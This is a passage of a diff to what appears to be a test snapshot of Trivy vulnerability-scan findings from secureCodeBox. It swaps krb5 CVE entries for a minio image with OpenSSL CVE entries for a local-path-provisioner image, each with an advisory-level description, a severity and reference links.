+commonly used by applications." +, + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "Certificate policy check not enabled", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", + "value": "https://avd.aquasec.com/nvd/cve-2023-0466", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", + "value": "https://access.redhat.com/security/cve/CVE-2023-0466", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", }, { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-6755", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "libssl1.1", + "references": [ + "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "http://rump2007.cr.yp.to/15-shumow.pdf", + "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "http://www.securityfocus.com/bid/63657", + "https://access.redhat.com/security/cve/CVE-2007-6755", + "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + ], + }, + "category": "Vulnerability", + "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "Dual_EC_DRBG: weak pseudo random number generator", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://avd.aquasec.com/nvd/cve-2007-6755", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "http://rump2007.cr.yp.to/15-shumow.pdf", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "http://www.securityfocus.com/bid/63657", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://access.redhat.com/security/cve/CVE-2007-6755", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libk5crypto3", + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-0928", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "http://www.osvdb.org/62808", + "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "https://access.redhat.com/security/cve/CVE-2010-0928", + "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "https://www.cve.org/CVERecord?id=CVE-2010-0928", ], }, "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "openssl: RSA authentication weakness", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://avd.aquasec.com/nvd/cve-2010-0928", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "http://www.osvdb.org/62808", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2010-0928", + }, + { + "type": "URL", + "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5-3", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0464", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "openssl", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "https://access.redhat.com/security/cve/CVE-2023-0464", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230322.txt", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": +"A security vulnerability has been identified in all supported versions + +of OpenSSL related to the verification of X.509 certificate chains +that include policy constraints. Attackers may be able to exploit this +vulnerability by creating a malicious certificate chain that triggers +exponential use of computational resources, leading to a denial-of-service +(DoS) attack on affected systems. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", + "value": "https://avd.aquasec.com/nvd/cve-2023-0464", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", + "value": "https://access.redhat.com/security/cve/CVE-2023-0464", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://www.openssl.org/news/secadv/20230322.txt", + }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-2650", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "openssl", + "references": [ + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", + ], + }, + "category": "Vulnerability", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "Possible DoS translating ASN.1 object identifiers", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://ubuntu.com/security/notices/USN-6119-1", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5-3", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0465", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "openssl", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "https://access.redhat.com/security/cve/CVE-2023-0465", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", ], }, "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": +"Applications that use a non-default option when verifying certificates may be +vulnerable to an attack from a malicious CA to circumvent certain checks. + +Invalid certificate policies in leaf certificates are silently ignored by +OpenSSL and other certificate policy checks are skipped for that certificate. +A malicious CA could use this to deliberately assert invalid certificate policies +in order to circumvent policy checking on the certificate altogether. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "Invalid certificate policies in leaf certificates are silently ignored", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://avd.aquasec.com/nvd/cve-2023-0465", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "https://access.redhat.com/security/cve/CVE-2023-0465", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + }, + { + "type": "URL", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + }, + { + "type": "URL", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6039-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2023/dsa-5417", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5support0", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0466", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "openssl", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - 